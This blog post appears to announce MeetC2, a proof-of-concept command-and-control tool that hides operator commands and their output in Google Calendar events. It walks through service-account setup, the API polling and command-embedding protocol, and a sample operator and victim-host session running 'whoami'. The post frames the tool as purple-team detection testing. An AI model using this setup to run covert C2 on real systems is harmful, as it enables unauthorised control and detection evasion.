MeetC2 is a PoC C2 tool using Google Calendar to mimic cloud abuse, helping teams test detection, logging, and response.————————————————————————————————————————**Background:**Modern adversaries increasingly hide command-and-control (C2) traffic inside cloud services. We built this proof of concept (PoC) to study and demonstrate those techniques in a controlled way, emulating those tactics so red and blue teams can exercise detection, telemetry, and response to cloud abuse scenarios.**Storytime:** During an internal purple-team exercise, we saw how easily traffic to trusted SaaS domains slipped. We built a lightweight, cross-platform PoC that uses Google Calendar, giving teams a reproducible way to validate detections, logging, and third-party app governance for cloud-abuse C2 in a controlled environment.**MeetC2: [MeetC2](https://github.com/deriv-security/MeetC2) is a proof-of-concept C2 framework that uses the Google Calendar API as a covert communication channel between operators and a compromised system.**Overview——–[MeetC2](https://github.com/deriv-security/MeetC2), a.k.a. MeetingC2, is a cross-platform (macOS/Linux) application that demonstrates how legitimate cloud services can be abused for adversarial operations. By using Google Calendar APIs, the framework creates a hidden communication channel that blends in with normal business traffic.Domains utilised here are ‘*oauth2.googleapis.com* ‘ -& ‘*www.googleapis.com* ‘. Once authenticated, the agent enters a polling loop, sending GET requests every 30 seconds to ‘*www.googleapis.com/calendar/v3/calendars/{calendarId}/events*’ to check for new calendar events containing commands.When the organiser wants to issue a new command, they can **POST** a new event to the same Calendar API endpoint via ‘*organiser* ‘ agent with the command embedded in the event’s summary field, like ‘*Meeting from nobody: -[COMMAND-]* ‘.The ‘*guest* ‘ agent identifies these command events during its regular polling, which extracts and executes the command locally, then updates the same event via a **PUT** request to include the command output within the *-[OUTPUT-] -[/OUTPUT-]* parameter in the description field.
Google Calendar Setup———————* Navigate to the URL[Google cloud console](https://console.cloud.google.com/?hl=en), sign in with your Google account. Select a project or create a new project.* Navigate to ‘APIs -& Services’ → Click ‘Library’, in the search box, look for Google Calendar API and click ‘ENABLED’, it will take 20–30 seconds to get it enabled in your project.* Post this, navigate to ‘APIs -& Services’ → ‘Credentials’ and click ‘+ CREATE CREDENTIALS’ at the top. Choose ‘Service account’, fill in the required details, i.e., Service account name: calendar-invite, Description: Syncs calendar events and continue. Skip the optional role/users and click ‘DONE’.* Now check your service account lists, and you should have an email like ‘calendar-invite@your-project.iam.gserviceaccount.com’. Go to the ‘KEYS’ section ‘ADD KEY’ → ‘Create new key’, choose the ‘JSON’ format and download the ‘KEY’. Rename the downloaded JSON file to credentials.json for later use.* Navigate to the URL ‘https://calendar.google.com’, on the left side, find ‘Other calendars’ → Click the ‘+’ click on create new calendar, fill in the name/description. Post that, click on the 3 dots next to it → ‘Settings and sharing’. Scroll down to ‘Integrate calendar’, check for ‘Calendar ID’ it should look like ‘abc123xyz@group.calendar.google.com’.* Final steps, under calendar settings, find ‘Share with specific people’ click on ‘+ Add people’, add the service account email from step 4 above (the one ending in @your-project.iam.gserviceaccount.com). Change the permission to ‘Make changes to events’ and click ‘Send’, and you are all set.Command Line————***Compile:***> ./build-all.sh – -***Attacker host:***> bash-3.2$ ./organizer credentials.json -[NAME-]@group.calendar.google.com >> MeetC2 Organizer >> Commands: >> exec – — Execute on all hosts >> exec @host:- — Execute on specific host >> exec @-*:- — Execute on all hosts (explicit) >> list — List recent commands >> get – — Get command output >> clear — Clear executed events >> exit — Exit organizer >> — — — — — — — — — — — — — — — — — — — — >> -> exec whoami >> Command created for all hosts: qfj4tt8a4uoi8p7cd3b8t31337 >> -> >> ->***Victim host:***> bash-3.2$ ./guest-darwin-arm64 >> 16:08:04 MeetC2 Guest started on dhirajmishra >> 16:08:04 Calendar ID: -[NAME-]@group.calendar.google.com >> 16:08:04 Polling every 10 seconds… >> 16:08:15 Executing command: whoami >> 16:08:16 Successfully updated event with output**Acknowledgements:** This project was inspired by the [GC2-sheet](https://github.com/looCiprian/GC2-sheet) author[LooCiprian](https://github.com/looCiprian). Hence, special thanks to him.**OpSec:** While this is functional, I know there are improvements in OpSec specifically for the ‘*guest*’ binary. Hence, please use a test GCP project for such a setup, which should be purged later.### **Download MeetC2**[**https://github.com/deriv-security/MeetC2**](https://github.com/deriv-security/MeetC2)**About the Author: Security Researcher Dhiraj Mishra ([@mishradhiraj](https://twitter.com/mishradhiraj_))**Follow me on Twitter: [@securityaffairs](https://twitter.com/securityaffairs) and [Facebook](https://www.facebook.com/sec.affairs) and [Mastodon](https://infosec.exchange/@securityaffairs)[Pierluigi Paganini](http://www.linkedin.com/pub/pierluigi-paganini/b/742/559)([SecurityAffairs](http://securityaffairs.co/wordpress/) — hacking, MeetC2)
Related Tags:
NAICS: 517 – Telecommunications
NAICS: 541 – Professional
Scientific
Technical Services
NAICS: 518 – Computing Infrastructure Providers
Data Processing
Web Hosting
Related Services
NAICS: 51 – Information
Blog: Security Affairs
Web Service: Bidirectional Communication
Web Service
Associated Indicators:
https://github.com/deriv-security/MeetC2
your-project.iam.gserviceaccount.com
calendar-invite@your-project.iam.gserviceaccount.com